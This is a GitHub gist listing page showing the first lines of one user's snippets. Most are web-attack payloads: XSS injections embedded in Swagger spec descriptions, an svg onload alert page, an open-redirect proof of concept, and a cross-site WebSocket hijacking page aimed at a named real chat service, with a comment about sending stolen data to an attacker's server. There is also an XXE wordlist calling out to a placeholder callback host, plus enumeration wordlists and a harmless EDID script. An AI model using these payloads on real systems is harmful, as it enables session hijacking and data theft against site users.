istefy
/ swagger-xss.yaml
Last active
April 19, 2024 09:32
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| swagger: '2.0' | |
| info: | |
| title: Example yaml.spec | |
| description: | | |
| <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(window.origin)'>"> | |
| paths: | |
| /accounts: | |
| get: | |
| responses: | |
| '200': |
istefy
/ Swagger OpenRedirect PoC
Last active
November 30, 2023 08:17
— forked from QuduSEC/Swagger OpenRedirect PoC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| swagger: "2.0" | |
| info: | |
| description: "This is a sample server Petstore server. You can find out more about Swagger at [http://swagger.io](http://swagger.io) or on [irc.freenode.net, #swagger](http://swagger.io/irc/). For this sample, you can use the api key `special-key` to test the authorization filters." | |
| version: "1.0.0" | |
| title: "Swagger Petstore" | |
| termsOfService: "http://swagger.io/terms/" | |
| contact: | |
| email: "apiteam@swagger.io" | |
| license: | |
| name: "Apache 2.0" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <svg/onload=alert(document.domain) | |
| </html> |
istefy
/ patch-edid.rb
Created
December 23, 2021 14:00
— forked from adaugherity/patch-edid.rb
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/ruby | |
| # Create display override file to force Mac OS X to use RGB mode for Display | |
| # see http://embdev.net/topic/284710 | |
| require 'base64' | |
| data=`ioreg -l -d0 -w 0 -r -c AppleDisplay` | |
| edids=data.scan(/IODisplayEDID.*?<([a-z0-9]+)>/i).flatten | |
| vendorids=data.scan(/DisplayVendorID.*?([0-9]+)/i).flatten |
istefy
/ websocket-hijacking.html
Created
September 8, 2021 17:18
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <script> | |
| var ws = new WebSocket("wss://chat.domclick.ru/socket.io/?mode=multi&userAgent=websocket-client%40unknown%20%23unknown&EIO=3&transport=websocket"); | |
| ws.onopen = start | |
| ws.onmessage = handleReply | |
| function start(event) { | |
| ws.send("READY"); //Send the message to retreive confidential information | |
| } | |
| function handleReply(event) { | |
| //Exfiltrate the confidential information to attackers server |
istefy
/ swagger-2.json
Last active
November 26, 2021 11:06
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| swagger : "2.0", | |
| info : { | |
| description : "<a href=https://gitlab.com/yvvdwf/data/-/wikis/alert.md data-type=script style='cursor:default' data-remote=true class='atwho-view select2-drop-mask pika-select'></a><script>alert(0)</script>", | |
| title : "Hello" | |
| }, | |
| version: "1.1.1" | |
| } |
istefy
/ xxe-payloads.txt
Created
September 20, 2020 17:56
— forked from honoki/xxe-payloads.txt
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y |
istefy
/ gist:b7b7d774a5daf3e44a9a6b11ee96a5ef
Created
September 16, 2019 16:58
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ### Keybase proof | |
| I hereby claim: | |
| * I am istefy on github. | |
| * I am istef (https://keybase.io/istef) on keybase. | |
| * I have a public key ASA0XzRqHCN0laSZyTAdhn3YkFX5opmZ14q7FIGRv9_PIAo | |
| To claim this, I am signing this object: |
istefy
/ content_discovery_all.txt
Created
October 25, 2018 08:58
— forked from jhaddix/content_discovery_all.txt
a masterlist of content discovery URLs and files (used most commonly with gobuster)
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ` | |
| ~/ | |
| ~ | |
| ×™× | |
| ___ | |
| __ | |
| _ |
istefy
/ all.txt
Created
October 25, 2018 08:58
— forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| . | |
| .. | |
| ........ | |
| @ | |
| * | |
| *.* | |
| *.*.* | |
| 🎠|
NewerOlder